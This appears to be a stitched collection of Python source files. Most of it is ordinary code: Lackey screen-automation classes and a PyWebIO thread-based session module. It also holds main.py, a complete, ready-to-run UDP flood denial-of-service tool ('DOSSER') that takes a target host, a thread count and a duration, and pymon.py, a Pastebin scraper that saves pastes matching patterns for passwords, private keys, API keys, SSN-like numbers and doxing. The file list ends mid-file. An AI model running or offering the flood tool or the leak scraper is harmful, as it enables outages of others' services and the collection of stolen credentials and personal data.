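#   reg.observe(10)   # polls the registered events for up to 10 seconds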
def getObserveScanRate(self):
""" Gets the number of times per second the observe loop should run """
return self._observeScanRate if self._observeScanRate is not None else Settings.ObserveScanRate
def setObserveScanRate(self, scan_rate):
""" Set the number of times per second the observe loop should run """
self._observeScanRate = scan_rate
def getRepeatWaitTime(self):
""" Gets the wait time before repeating a search """
return self._repeatWaitTime
def setRepeatWaitTime(self, wait_time):
""" Sets the wait time before repeating a search """
self._repeatWaitTime = wait_time
def observeInBackground(self, seconds=None):
""" As Region.observe(), but runs in a background process, allowing the rest
of your script to continue.
Note that the subprocess operates on *copies* of the usual objects, not the original
Region object itself for example. If your event handler needs to share data with your
main process, check out the documentation for the ``multiprocessing`` module to set up
shared memory.
"""
if self._observer.isRunning:
return False
self._observer_process = multiprocessing.Process(target=self.observe, args=(seconds,))
self._observer_process.start()
return True
def stopObserver(self):
""" Stops this region's observer loop.
If this is running in a subprocess, the subprocess will end automatically.
"""
self._observer.isStopped = True
self._observer.isRunning = False
def hasObserver(self):
""" Check whether at least one event is registered for this region.
The observer may or may not be running.
"""
return self._observer.has_events()
def isObserving(self):
""" Check whether an observer is running for this region """
return self._observer.isRunning
def hasEvents(self):
""" Check whether any events have been caught for this region """
return len(self._observer.caught_events) > 0
def getEvents(self):
""" Returns a list of all events that have occurred.
Empties the internal queue.
"""
caught_events = self._observer.caught_events
self._observer.caught_events = []
for event in caught_events:
self._observer.activate_event(event["name"])
return caught_events
def getEvent(self, name):
""" Returns the named event.
Removes it from the internal queue.
"""
to_return = None
for event in self._observer.caught_events:
if event["name"] == name:
to_return = event
break
if to_return:
self._observer.caught_events.remove(to_return)
self._observer.activate_event(to_return["name"])
return to_return
def setInactive(self, name):
""" The specified event is ignored until reactivated
or until the observer restarts.
"""
self._observer.inactivate_event(name)
def setActive(self, name):
""" Activates an inactive event type. """
self._observer.activate_event(name)
def _raiseImageMissing(self, pattern):
""" Builds an ImageMissing event and triggers the default handler (or the custom handler,
if one has been specified). Returns True if throwing method should retry, False if it
should skip, and throws an exception if it should abort. """
event = ImageMissingEvent(self, pattern=pattern, event_type="MISSING")
if self._imageMissingHandler is not None:
self._imageMissingHandler(event)
response = (event._response or self._findFailedResponse)
#if response == "PROMPT": # Prompt not valid for ImageMissing error
# response = _findFailedPrompt(pattern)
if response == "ABORT":
raise FindFailed(event)
elif response == "SKIP":
return False
elif response == "RETRY":
return True
def setImageMissingHandler(self, handler):
""" Set a handler to receive ImageMissing events (instead of triggering
an exception). """
if not callable(handler):
raise ValueError("Expected ImageMissing handler to be a callable")
self._imageMissingHandler = handler
## FindFailed event handling ##
# Constants
ABORT = "ABORT"
SKIP = "SKIP"
PROMPT = "PROMPT"
RETRY = "RETRY"
def setFindFailedResponse(self, response):
""" Set the response to a FindFailed exception in this region.
Can be ABORT, SKIP, PROMPT, or RETRY. """
valid_responses = ("ABORT", "SKIP", "PROMPT", "RETRY")
if response not in valid_responses:
raise ValueError("Invalid response - expected one of ({})".format(", ".join(valid_responses)))
self._findFailedResponse = response
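# Usage sketch: skip over optional UI elements instead of aborting on FindFailed
# ("optional_popup.png" is a hypothetical image):
#   reg.setFindFailedResponse(Region.SKIP)
#   reg.click("optional_popup.png")   # continues silently if the popup never shows
#   reg.setFindFailedResponse(Region.ABORT)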
def setFindFailedHandler(self, handler):
""" Set a handler to receive FindFailed events (instead of triggering
an exception). """
if not callable(handler):
raise ValueError("Expected FindFailed handler to be a callable")
self._findFailedHandler = handler
def getFindFailedResponse(self):
""" Returns the current default response to a FindFailed exception """
return self._findFailedResponse
def setThrowException(self, setting):
""" Defines whether an exception should be thrown for FindFailed operations.
``setting`` should be True or False. """
if setting:
self._throwException = True
self._findFailedResponse = "ABORT"
else:
self._throwException = False
self._findFailedResponse = "SKIP"
def getThrowException(self):
""" Returns True if an exception will be thrown for FindFailed operations,
False otherwise. """
return self._throwException
def _raiseFindFailed(self, pattern):
""" Builds a FindFailed event and triggers the default handler (or the custom handler,
if one has been specified). Returns True if throwing method should retry, False if it
should skip, and throws an exception if it should abort. """
event = FindFailedEvent(self, pattern=pattern, event_type="FINDFAILED")
if self._findFailedHandler is not None:
self._findFailedHandler(event)
response = (event._response or self._findFailedResponse)
if response == "PROMPT":
response = self._findFailedPrompt(pattern)
if response == "ABORT":
raise FindFailed(event)
elif response == "SKIP":
return False
elif response == "RETRY":
return True
def _findFailedPrompt(self, pattern):
ret_value = tkmb.showerror(
title="Sikuli Prompt",
message="Could not find target '{}'. Abort, retry, or skip?".format(pattern),
type=tkmb.ABORTRETRYIGNORE)
value_map = {
"abort": "ABORT",
"retry": "RETRY",
"ignore": "SKIP"
}
return value_map[ret_value]
class Observer(object):
def __init__(self, region):
self._supported_events = ("APPEAR", "VANISH", "CHANGE")
self._region = region
self._events = {}
self.isStopped = False
self.isRunning = False
self.caught_events = []
def inactivate_event(self, name):
if name in self._events:
self._events[name].active = False
def activate_event(self, name):
if name in self._events:
self._events[name].active = True
def has_events(self):
return len(self._events) > 0
def register_event(self, event_type, pattern, handler):
""" When ``event_type`` is observed for ``pattern``, triggers ``handler``.
For "CHANGE" events, ``pattern`` should be a tuple of ``min_changed_pixels`` and
the base screen state.
"""
if event_type not in self._supported_events:
raise ValueError("Unsupported event type {}".format(event_type))
if event_type in ("APPEAR", "VANISH") and not isinstance(pattern, (Pattern, basestring)):
raise ValueError("Expected pattern to be a Pattern or string for {} events".format(event_type))
# Create event object
event = {
"pattern": pattern,
"event_type": event_type,
"count": 0,
"handler": handler,
"name": uuid.uuid4(),
"active": True
}
self._events[event["name"]] = event
return event["name"]
def check_events(self):
for event_name in self._events.keys():
event = self._events[event_name]
if not event["active"]:
continue
event_type = event["event_type"]
pattern = event["pattern"]
handler = event["handler"]
if event_type == "APPEAR" and self._region.exists(event["pattern"], 0):
# Call the handler with a new ObserveEvent object
appear_event = ObserveEvent(self._region,
count=event["count"],
pattern=event["pattern"],
event_type=event["event_type"])
if callable(handler):
handler(appear_event)
self.caught_events.append(appear_event)
event["count"] += 1
# Event handlers are inactivated after being caught once
event["active"] = False
elif event_type == "VANISH" and not self._region.exists(event["pattern"], 0):
# Call the handler with a new ObserveEvent object
vanish_event = ObserveEvent(self._region,
count=event["count"],
pattern=event["pattern"],
event_type=event["event_type"])
if callable(handler):
handler(vanish_event)
else:
self.caught_events.append(vanish_event)
event["count"] += 1
# Event handlers are inactivated after being caught once
event["active"] = False
# For a CHANGE event, ``pattern`` is a tuple of
# (min_pixels_changed, original_region_state)
elif event_type == "CHANGE" and self._region.isChanged(*event["pattern"]):
# Call the handler with a new ObserveEvent object
change_event = ObserveEvent(self._region,
count=event["count"],
pattern=event["pattern"],
event_type=event["event_type"])
if callable(handler):
handler(change_event)
else:
self.caught_events.append(change_event)
event["count"] += 1
# Event handlers are inactivated after being caught once
event["active"] = False
class ObserveEvent(object):
def __init__(self, region=None, count=0, pattern=None, match=None, event_type="GENERIC"):
self._valid_types = ["APPEAR", "VANISH", "CHANGE", "GENERIC", "FINDFAILED", "MISSING"]
self._type = event_type
self._region = region
self._pattern = pattern
self._match = match
self._count = count
def getType(self):
return self._type
def isAppear(self):
return (self._type == "APPEAR")
def isVanish(self):
return (self._type == "VANISH")
def isChange(self):
return (self._type == "CHANGE")
def isGeneric(self):
return (self._type == "GENERIC")
def isFindFailed(self):
return (self._type == "FINDFAILED")
def isMissing(self):
return (self._type == "MISSING")
def getRegion(self):
return self._region
def getPattern(self):
return self._pattern
def getImage(self):
valid_types = ["APPEAR", "VANISH", "FINDFAILED", "MISSING"]
if self._type not in valid_types:
raise TypeError("This is a(n) {} event, but method getImage is only valid for the following event types: ({})".format(self._type, ", ".join(valid_types)))
elif self._pattern is None:
raise ValueError("This event's pattern was not set!")
return cv2.imread(self._pattern.path)
def getMatch(self):
valid_types = ["APPEAR", "VANISH"]
if self._type not in valid_types:
raise TypeError("This is a(n) {} event, but method getMatch is only valid for the following event types: ({})".format(self._type, ", ".join(valid_types)))
elif self._match is None:
raise ValueError("This event's match was not set!")
return self._match
def getChanges(self):
valid_types = ["CHANGE"]
if self._type not in valid_types:
raise TypeError("This is a(n) {} event, but method getChanges is only valid for the following event types: ({})".format(self._type, ", ".join(valid_types)))
elif self._match is None:
raise ValueError("This event's match was not set!")
return self._match
def getCount(self):
return self._count
class FindFailedEvent(ObserveEvent):
def __init__(self, *args, **kwargs):
ObserveEvent.__init__(self, *args, **kwargs)
self._response = None
def setResponse(self, response):
valid_responses = ("ABORT", "SKIP", "PROMPT", "RETRY")
if response not in valid_responses:
raise ValueError("Invalid response - expected one of ({})".format(", ".join(valid_responses)))
else:
self._response = response
def __repr__(self):
if hasattr(self._pattern, "path"):
return self._pattern.path
return self._pattern
class ImageMissingEvent(ObserveEvent):
def __init__(self, *args, **kwargs):
ObserveEvent.__init__(self, *args, **kwargs)
self._response = None
def setResponse(self, response):
valid_responses = ("ABORT", "SKIP", "RETRY")
if response not in valid_responses:
raise ValueError("Invalid response - expected one of ({})".format(", ".join(valid_responses)))
else:
self._response = response
def __repr__(self):
if hasattr(self._pattern, "path"):
return self._pattern.path
return self._pattern
class Match(Region):
""" Extended Region object with additional data on click target, match score """
def __init__(self, score, target, rect):
super(Match, self).__init__(rect[0][0], rect[0][1], rect[1][0], rect[1][1])
self._score = float(score)
if not target or not isinstance(target, Location):
raise TypeError("Match expected target to be a Location object")
self._target = target
def getScore(self):
""" Returns confidence score of the match """
return self._score
def getTarget(self):
""" Returns the location of the match click target (center by default, but may be offset) """
return self.getCenter().offset(self._target.x, self._target.y)
def __repr__(self):
return "Match[{},{} {}x{}] score={:2f}, target={}".format(self.x, self.y, self.w, self.h, self._score, self._target.getTuple())
class Screen(Region):
""" Individual screen objects can be created for each monitor in a multi-monitor system.
Screens are indexed according to the system order. 0 is the primary monitor (display 1),
1 is the next monitor, etc.
Lackey also makes it possible to search all screens as a single "virtual screen," arranged
according to the system's settings. Screen(-1) returns this virtual screen. Note that the
larger your search region is, the slower your search will be, so it's best practice to adjust
your region to the particular area of the screen where you know your target will be.
Note that Sikuli is inconsistent in identifying screens. In Windows, Sikuli identifies the
first hardware monitor as Screen(0) rather than the actual primary monitor. However, on OS X
it follows the latter convention. We've opted to make Screen(0) the actual primary monitor
(wherever the Start Menu/System Menu Bar is) across the board.
"""
primaryScreen = 0
def __init__(self, screenId=None):
""" Defaults to the main screen. """
if not isinstance(screenId, int) or screenId < -1 or screenId >= len(PlatformManager.getScreenDetails()):
screenId = Screen.getPrimaryID()
self._screenId = screenId
x, y, w, h = self.getBounds()
self.lastScreenImage = None
super(Screen, self).__init__(x, y, w, h)
@classmethod
def getNumberScreens(cls):
""" Get the number of screens in a multi-monitor environment at the time the script is running """
return len(PlatformManager.getScreenDetails())
def getBounds(self):
""" Returns bounds of screen as (x, y, w, h) """
return PlatformManager.getScreenBounds(self._screenId)
def capture(self, *args): #x=None, y=None, w=None, h=None):
""" Captures the region as an image """
if len(args) == 0:
# Capture screen region
region = self
elif isinstance(args[0], Region):
# Capture specified region
region = args[0]
elif isinstance(args[0], tuple):
# Capture region defined by specified tuple
region = Region(*args[0])
elif isinstance(args[0], basestring):
# Interactive mode
raise NotImplementedError("Interactive capture mode not defined")
elif isinstance(args[0], int):
# Capture region defined by provided x,y,w,h
region = Region(*args)
self.lastScreenImage = region.getBitmap()
return self.lastScreenImage
captureForHighlight = capture
def selectRegion(self, text=""):
""" Not yet implemented """
raise NotImplementedError()
def doPrompt(self, message, obs):
""" Not yet implemented """
raise NotImplementedError()
def closePrompt(self):
""" Not yet implemented """
raise NotImplementedError()
def resetPrompt(self):
""" Not yet implemented """
raise NotImplementedError()
def hasPrompt(self):
""" Not yet implemented """
raise NotImplementedError()
def userCapture(self, message=""):
""" Not yet implemented """
raise NotImplementedError()
def saveCapture(self, name, reg=None):
""" Not yet implemented """
raise NotImplementedError()
def getCurrentID(self):
""" Returns screen ID """
return self._screenId
getID = getCurrentID
@classmethod
def getPrimaryID(cls):
""" Returns primary screen ID """
return cls.primaryScreen
@classmethod
def getPrimaryScreen(cls):
""" Returns the primary screen """
return Screen(cls.primaryScreen)
@classmethod
def showMonitors(cls):
""" Prints debug information about currently detected screens """
Debug.info("*** monitor configuration [ {} Screen(s)] ***".format(cls.getNumberScreens()))
Debug.info("*** Primary is Screen {}".format(cls.primaryScreen))
for index, screen in enumerate(PlatformManager.getScreenDetails()):
Debug.info("Screen {}: ({}, {}, {}, {})".format(index, *screen["rect"]))
Debug.info("*** end monitor configuration ***")
def resetMonitors(self):
""" Recalculates screen based on changed monitor setup """
Debug.error("*** BE AWARE: experimental - might not work ***")
Debug.error("Re-evaluation of the monitor setup has been requested")
Debug.error("... Current Region/Screen objects might not be valid any longer")
Debug.error("... Use existing Region/Screen objects only if you know what you are doing!")
self.__init__(self._screenId)
self.showMonitors()
def newRegion(self, loc, width, height):
""" Creates a new region on the current screen at the specified offset with the specified
width and height. """
return Region.create(self.getTopLeft().offset(loc), width, height)
def getLastScreenImageFromScreen(self):
""" Returns the last captured image from this screen """
return self.lastScreenImage
def newLocation(self, loc):
""" Creates a new location on this screen, with the same offset it would have had on the
default screen """
return Location(loc).copyTo(self)
def showTarget(self):
""" Not yet implemented """
raise NotImplementedError()
|
threadbased.py
|
import logging
import queue
import threading
from functools import wraps
from .base import Session
from ..exceptions import SessionNotFoundException, SessionClosedException, SessionException
from ..utils import random_str, LimitedSizeQueue, isgeneratorfunction, iscoroutinefunction, \
get_function_name
logger = logging.getLogger(__name__)
"""
基于线程的会话实现
当任务函数返回并且会话内所有的通过 register_thread(thread) 注册的线程都退出后,会话结束,连接关闭。
正在等待PyWebIO输入的线程会在输入函数中抛出SessionClosedException异常,
其他线程若调用PyWebIO输入输出函数会引发异常SessionException
"""
# todo 线程安全
class ThreadBasedSession(Session):
thread2session = {} # thread_id -> session
unhandled_task_mq_maxsize = 1000
event_mq_maxsize = 100
callback_mq_maxsize = 100
@classmethod
def get_current_session(cls) -> "ThreadBasedSession":
curr = id(threading.current_thread())
session = cls.thread2session.get(curr)
if session is None:
raise SessionNotFoundException("Can't find current session. "
"Maybe session closed or forget to use `register_thread()`.")
return session
@classmethod
def get_current_task_id(cls):
return cls._get_task_id(threading.current_thread())
@staticmethod
def _get_task_id(thread: threading.Thread):
tname = getattr(thread, '_target', 'task')
tname = getattr(tname, '__name__', tname)
return '%s-%s' % (tname, id(thread))
def __init__(self, target, session_info, on_task_command=None, on_session_close=None, loop=None):
"""
:param target: The function the session runs. None means script mode.
:param on_task_command: Handler invoked when a task sends a command to the session.
:param on_session_close: Handler invoked when the session ends.
:param loop: Event loop. If on_task_command or on_session_close makes calls that rely on the
asyncio event loop, the loop instance is needed so that those callbacks run in the
event loop's thread.
"""
assert target is None or (not iscoroutinefunction(target)) and (not isgeneratorfunction(target)), ValueError(
"ThreadBasedSession only accept a simple function as task function, "
"not coroutine function or generator function. ")
super().__init__(session_info)
self._on_task_command = on_task_command or (lambda _: None)
self._on_session_close = on_session_close or (lambda: None)
self._loop = loop
self.threads = []  # threads registered to the current session
self.unhandled_task_msgs = LimitedSizeQueue(maxsize=self.unhandled_task_mq_maxsize)
self.task_mqs = {} # task_id -> event msg queue
self._closed = False
# bookkeeping for registering callback functions
self.callback_mq = None
self.callback_thread = None
self.callbacks = {} # callback_id -> (callback_func, is_mutex)
if target is not None:
self._start_main_task(target)
def _start_main_task(self, target):
@wraps(target)
def main_task(target):
try:
target()
except Exception as e:
if not isinstance(e, SessionException):
self.on_task_exception()
finally:
for t in self.threads:
if t.is_alive() and t is not threading.current_thread():
t.join()
try:
if self.need_keep_alive():
from ..session import hold
hold()
else:
self.send_task_command(dict(command='close_session'))
except SessionException: # ignore SessionException error
pass
finally:
self._trigger_close_event()
self.close()
thread = threading.Thread(target=main_task, kwargs=dict(target=target),
daemon=True, name='main_task')
self.register_thread(thread)
thread.start()
def send_task_command(self, command):
"""向会话发送来自pywebio应用的消息
:param dict command: 消息
"""
if self.closed():
raise SessionClosedException()
self.unhandled_task_msgs.put(command)
if self._loop:
self._loop.call_soon_threadsafe(self._on_task_command, self)
else:
self._on_task_command(self)
def next_client_event(self):
# No need to check self.closed() at the start of this function:
# if the session has been closed, get_current_session().next_client_event() raises SessionNotFoundException
task_id = self.get_current_task_id()
event_mq = self.get_current_session().task_mqs.get(task_id)
if event_mq is None:
raise SessionNotFoundException
event = event_mq.get()
if event is None:
raise SessionClosedException
return event
def send_client_event(self, event):
"""向会话发送来自用户浏览器的事件️
:param dict event: 事件️消息
"""
task_id = event['task_id']
mq = self.task_mqs.get(task_id)
if not mq and task_id in self.callbacks:
mq = self.callback_mq
if not mq:
logger.error('event_mqs not found, task_id:%s', task_id)
return
try:
mq.put_nowait(event) # disable blocking, because this is call by backend
except queue.Full:
logger.error('Message queue is full, discard new messages') # todo: alert user
def get_task_commands(self):
return self.unhandled_task_msgs.get()
def _trigger_close_event(self):
"""触发Backend on_session_close callback"""
if self.closed():
return
if self._loop:
self._loop.call_soon_threadsafe(self._on_session_close)
else:
self._on_session_close()
def _cleanup(self, nonblock=False):
cls = type(self)
if not nonblock:
self.unhandled_task_msgs.wait_empty(8)
if not self.unhandled_task_msgs.empty():
msg = self.unhandled_task_msgs.get()
logger.warning("%d unhandled task messages when session close. [%s]", len(msg), threading.current_thread())
for t in self.threads:
# delete registered thread
# so the `get_current_session()` call in those thread will raise SessionNotFoundException
del cls.thread2session[id(t)]
if self.callback_thread:
del cls.thread2session[id(self.callback_thread)]
def try_best_to_add_item_to_mq(mq, item, try_count=10):
for _ in range(try_count):
try:
mq.put(item, block=False)
return True
except queue.Full:
try:
mq.get(block=False)
except queue.Empty:
pass
if self.callback_mq is not None:  # callback feature is active; stop the callback thread
try_best_to_add_item_to_mq(self.callback_mq, None)
for mq in self.task_mqs.values():
try_best_to_add_item_to_mq(mq, None)  # consumers that receive None raise SessionClosedException
self.task_mqs = {}
def close(self, nonblock=False):
"""关闭当前Session。由Backend调用"""
# todo self._closed 会有竞争条件
if self.closed():
return
super().close()
self._cleanup(nonblock=nonblock)
def _activate_callback_env(self):
"""激活回调功能
ThreadBasedSession 的回调实现原理是:创建一个单独的线程用于接收回调事件,进而调用相关的回调函数。
当用户Task中并没有使用到回调功能时,不必开启此线程,可以节省资源
"""
if self.callback_mq is not None: # 回调功能已经激活
return
self.callback_mq = queue.Queue(maxsize=self.callback_mq_maxsize)
self.callback_thread = threading.Thread(target=self._dispatch_callback_event,
daemon=True, name='callback-' + random_str(10))
# self.register_thread(self.callback_thread)
self.thread2session[id(self.callback_thread)] = self  # lets the session be looked up from inside the thread
event_mq = queue.Queue(maxsize=self.event_mq_maxsize)  # user event queue for the callback thread
self.task_mqs[self._get_task_id(self.callback_thread)] = event_mq
self.callback_thread.start()
logger.debug('Callback thread start')
def _dispatch_callback_event(self):
while not self.closed():
event = self.callback_mq.get()
if event is None:  # stop signal
logger.debug('Callback thread exit')
break
callback_info = self.callbacks.get(event['task_id'])
if not callback_info:
logger.error("No callback for callback_id:%s", event['task_id'])
return
callback, mutex = callback_info
@wraps(callback)
def run(callback):
try:
callback(event['data'])
except Exception as e:
# Subclasses may override get_current_session, so don't call ThreadBasedSession.get_current_session directly
if not isinstance(e, SessionException):
self.on_task_exception()
# todo: good to have -> clean up from `register_thread()`
if mutex:
run(callback)
else:
t = threading.Thread(target=run, kwargs=dict(callback=callback),
daemon=True)
self.register_thread(t)
t.start()
def register_callback(self, callback, serial_mode=False):
""" 向Session注册一个回调函数,返回回调id
:param Callable callback: 回调函数. 函数签名为 ``callback(data)``. ``data`` 参数为回调事件的值
:param bool serial_mode: 串行模式模式。若为 ``True`` ,则对于同一组件的点击事件,串行执行其回调函数
"""
assert (not iscoroutinefunction(callback)) and (not isgeneratorfunction(callback)), ValueError(
"In ThreadBasedSession.register_callback, `callback` must be a simple function, "
"not coroutine function or generator function. ")
self._activate_callback_env()
callback_id = 'CB-%s-%s' % (get_function_name(callback, 'callback'), random_str(10))
self.callbacks[callback_id] = (callback, serial_mode)
return callback_id
def register_thread(self, t: threading.Thread):
"""将线程注册到当前会话,以便在线程内调用 pywebio 交互函数。
会话会一直保持直到所有通过 `register_thread` 注册的线程以及当前会话的主任务线程退出
:param threading.Thread thread: 线程对象
"""
self.threads.append(t)  # keep the registered thread so the main task thread can wait for it on exit
self.thread2session[id(t)] = self  # lets the session be looked up from inside the thread
event_mq = queue.Queue(maxsize=self.event_mq_maxsize)  # user event queue for this thread
self.task_mqs[self._get_task_id(t)] = event_mq
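# Usage sketch (register_thread/put_text are the public helpers exposed by
# pywebio.session / pywebio.output; the worker below is hypothetical):
#   from pywebio.session import register_thread
#   from pywebio.output import put_text
#   def worker():
#       put_text("hello from a worker thread")
#   t = threading.Thread(target=worker)
#   register_thread(t)   # register before starting, so the thread can use PyWebIO functions
#   t.start()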
def need_keep_alive(self) -> bool:
# if callback thread is activated, then the session need to keep alive
return self.callback_thread is not None
class ScriptModeSession(ThreadBasedSession):
"""Script mode的会话实现"""
@classmethod
def get_current_session(cls) -> "ScriptModeSession":
if cls.instance is None:
raise SessionNotFoundException("Can't find current session. It might be a bug.")
if cls.instance.closed():
raise SessionClosedException()
return cls.instance
@classmethod
def get_current_task_id(cls):
task_id = super().get_current_task_id()
session = cls.get_current_session()
if task_id not in session.task_mqs:
session.register_thread(threading.current_thread())
return task_id
instance = None
def __init__(self, thread, session_info, on_task_command=None, loop=None):
"""
:param thread: The thread that first calls a PyWebIO interaction function. todo: this parameter does not seem necessary
:param on_task_command: Handler for session end. When the backend closes the connection in response
to on_session_close, it must make sure that every message in the session has been delivered to the client.
:param loop: Event loop. If on_task_command or on_session_close makes calls that rely on the asyncio
event loop, the loop instance is needed so that those callbacks run in the event loop's thread.
"""
if ScriptModeSession.instance is not None:
raise RuntimeError("ScriptModeSession can only be created once.")
ScriptModeSession.instance = self
super().__init__(target=None, session_info=session_info, on_task_command=on_task_command, loop=loop)
tid = id(thread)
event_mq = queue.Queue(maxsize=self.event_mq_maxsize)
self.task_mqs[tid] = event_mq
|
main.py
|
import threading
import socket
import random
import time
import sys
import os
class DOS: # Initialise the class
def main(self): # Main function contains the main code
try: # Check the arguments given with the command
self.target = str(sys.argv[1])
self.threads = int(sys.argv[2])
self.timer = float(sys.argv[3])
except IndexError: # If one of the arguments was not given correctly
print(f" [+] Command usage: python {sys.argv[0]} <target> <threads> <time> !") # Print the correct command usage
sys.exit() # Exit the code
os.system('cls' if os.name == 'nt' else 'clear') # Clear the screen
print(""" ██████╗ ██████╗ ███████╗███████╗███████╗██████╗
██╔══██╗██╔═══██╗██╔════╝██╔════╝██╔════╝██╔══██╗
██║ ██║██║ ██║███████╗███████╗█████╗ ██████╔╝
██║ ██║██║ ██║╚════██║╚════██║██╔══╝ ██╔══██╗
██████╔╝╚██████╔╝███████║███████║███████╗██║ ██║
╚═════╝ ╚═════╝ ╚══════╝╚══════╝╚══════╝╚═╝ ╚═╝
[!] Disclaimer: This script is made for educational
purposes and the developers assume no liability
and are not responsible for any misuse or damage
caused by DOSSER
""") # Display the splash screen
time.sleep(5) # Wait a few seconds to give time to read the disclaimer
self.timeout = time.time() + 1 * self.timer + 2 # Set how long time the attack will last
self.start() # Start the attack
def attack(self): # The attack function getting ran by each of the threads
try: # Catch any error that may occur
bytes = random._urandom(1024) # Generate our random byte string
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # Get the socket
while time.time() < self.timeout: # Loop until the time is up
port = random.randint(20, 55500) # Get the port
sock.sendto( # Send the data to the server
bytes * random.randint(5, 15),
(self.target, port)
)
return # End the script once the loop is done
sys.exit()
except: # Catch the errors and just ignore them
pass
def start(self): # Function to manage the attack
print(" [+] Starting Attack..\n") # Let the user know its starting the attack
time.sleep(2) # Sleep a bit to let the user read the message
for i in range(0, self.threads): # Loop over the amount of threads the user wants to use
print(f" [?] Starting thread {i}") # Let the user know a thread is starting
threading.Thread(target=self.attack).start() # Start the thread with the attack function
time.sleep(.3) # Wait a bit for dramatic effect
print("") # Print a newline at the end
if __name__ == '__main__': # If the file is getting ran directly
DOSClient = DOS() # Create the ddos client ( Class )
DOSClient.main() # Run the main function
|
pymon.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""PyMon
Author: -zYMTOM'
"""
import re
import requests
from bs4 import BeautifulSoup
import time
import threading
class pastebinLinks():
def __init__(self):
r = requests.get("http://pastebin.com/archive")
var = BeautifulSoup(r.text, "html.parser").find("div", {"id": "content_left"})
regex = re.compile('<a href="\/([A-Za-z]{1,9})">(.*?)<\/a>')
reg = regex.findall(str(var))
for captures in reg:
if not in_array(links, captures):
links.insert(len(links)+1, [captures[0], captures[1]])
print("Pastebin ID " + captures[0] + " Found")
time.sleep(30)
super(pastebinLinks).__init__()
class getPastebinPastes():
def __init__(self):
self.f = open('pastes.txt', 'a')
newlinks = []
for x in links:
if x not in crawled:
getlink = pastebinGet(x[0])
if getlink:
crawled.insert(len(crawled)+1, x)
match = False
for reg in regexes:
if reg.search(getlink):
match = True
for reg in regbl:
if reg.search(getlink):
match = False
if match:
print"Found interesting paste!"
self.f.write("PasteID: " + crawled + " \n" + getlink + "\n==================================\n")
time.sleep(5)
super(getPastebinPastes).__init__()
def pastebinGet(link):
r = requests.post("http://pastebin.com/raw.php?i="+link)
if not '<div class="content_title">This paste has been removed!</div>' in r.text:
return r.text
def in_array(array, compare0):
exist = False
for i in range(0, len(array)):
if compare0[0] in array[i][0]:
exist = True
break
return exist
def MonMain():
print "Starting"
pastebin_thread = threading.Thread(target=pastebinLinks)
pastebin_threadpaste = threading.Thread(target=getPastebinPastes)
for thread in (pastebin_thread, pastebin_threadpaste):
thread.daemon = True
thread.start()
# Keep the main thread alive, otherwise the daemon worker threads are killed immediately
for thread in (pastebin_thread, pastebin_threadpaste):
thread.join()
if __name__ == "__main__":
global crawled
global regbl
global regexes
global links
links = []
crawled = []
regexes = [
re.compile(r'[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}', re.I),
re.compile(r'\d{3}-?\d{2}-?\d{4}'),
re.compile(r'[^<A-F\d/]([A-F\d]{32})[^A-F\d]', re.I),
re.compile(r'FBI\s*Friday', re.I), # will need to work on this to not match CSS
re.compile(r'(lulzsec|antisec)', re.I),
re.compile(r'enable\s+secret', re.I),
re.compile(r'enable\s+password', re.I),
re.compile(r'\W(AIza.{35})'),
re.compile(r'<dionaea\.capture>', re.I),
re.compile(r'BEGIN PGP PRIVATE', re.I),
re.compile(r'BEGIN RSA PRIVATE', re.I),
re.compile(r'((customers?|email|users?|members?|acc(?:oun)?ts?)([-_|/\s]?(address|name|id[^")a-zA-Z0-9_]|[-_:|/\\])))', re.I),
re.compile(r'((\W?pass(wor)?d|hash)[\s|:])', re.I),
re.compile(r'((\btarget|\bsite)\s*?:?\s*?(([a-z][\w-]+:/{1,3})?([-\w\s_/]+\.)*[\w=/?%]+))', re.I), # very basic URL check - may be improved later
re.compile(r'(my\s?sql[^i_\.]|sql\s*server)', re.I),
re.compile(r'((host|target)[-_\s]+ip:)', re.I),
re.compile(r'(data[-_\s]*base|\Wdb)', re.I), # added the non-word char before db.. we'll see if that helps
re.compile(r'(table\s*?:)', re.I),
re.compile(r'((available|current)\s*(databases?|dbs?)\W)', re.I),
re.compile(r'(hacked\s*by)', re.I),
re.compile(r'dox', re.I)
]
regbl = [
re.compile(r'(select\s+.*?from|join|declare\s+.*?\s+as\s+|update.*?set|insert.*?into)', re.I), # SQL
re.compile(r'(define\(.*?\)|require_once\(.*?\))', re.I), # PHP
re.compile(r'(function.*?\(.*?\))', re.I),
re.compile(r'(Configuration(\.Factory|\s*file))', re.I),
re.compile(r'((border|background)-color)', re.I), # Basic CSS (Will need to be improved)
re.compile(r'(Traceback \(most recent call last\))', re.I),
re.compile(r'(java\.(util|lang|io))', re.I),
re.compile(r'(sqlserver\.jdbc)', re.I),
re.compile(r'faf\.fa\.proxies', re.I),
re.compile(r'Technic Launcher is starting', re.I),
re.compile(r'OTL logfile created on', re.I),
re.compile(r'RO Game Client crashed!', re.I),
re.compile(r'Selecting PSO2 Directory', re.I),
re.compile(r'TDSS Rootkit', re.I),
re.compile(r'SysInfoCrashReporterKey', re.I),
re.compile(r'Current OS Full name: ', re.I),
re.compile(r'Multi Theft Auto: ', re.I),
re.compile(r'Initializing cgroup subsys cpuset', re.I),
re.compile(r'Init vk network', re.I),
re.compile(r'MediaTomb UPnP Server', re.I)
]
MonMain()
|
pysmash.py
|
# -*- coding: utf-8 -*-
"""
Created on Sun Jun 21 17:15:00 2020
@Author: Zhi-Jiang Yang, Dong-Sheng Cao
@Institution: CBDD Group, Xiangya School of Pharmaceutical Science, CSU, China
@Homepage: http://www.scbdd.com
@Mail: yzjkid9@gmail.com; oriental-cds@163.com
@Blog: https://blog.iamkotori.com
♥I love Princess Zelda forever♥
"""
import multiprocessing as mp
import os
import time
import socket
from threading import Thread, Event
import tkinter as tk
from tkinter import ttk
from tkinter.messagebox import showinfo
from tkinter.scrolledtext import ScrolledText
from tkinter import Tk, Label, Entry, Button, Radiobutton, Scrollbar, Text, Frame
from tkinter.filedialog import askopenfilename
from tkinter.filedialog import asksaveasfilename
from tkinter import messagebox
import pandas as pd
from getRes import getFingerprintRes, predict
class SmashGui(Tk):
def __init__(self):
"""
Init
"""
Tk.__init__(self)
# self.pack()
self.geometry('600x400+500+200')
self.resizable(0, 0)
self.title('Smash molecule and obtain significant fragments')
self.bg = '#abbfc5'
self.fg = '#b70131'
self.btg = '#fdafaa'
self.filename = ''
self.lblFont = ('Times New Roman', 14)
self.creatTab()
self.createWidgets()
self.createPredictWidgets()
self.thread_run = None
self.thread_run_stop = Event()
try:
self.iconbitmap(r"icon.ico")
except:
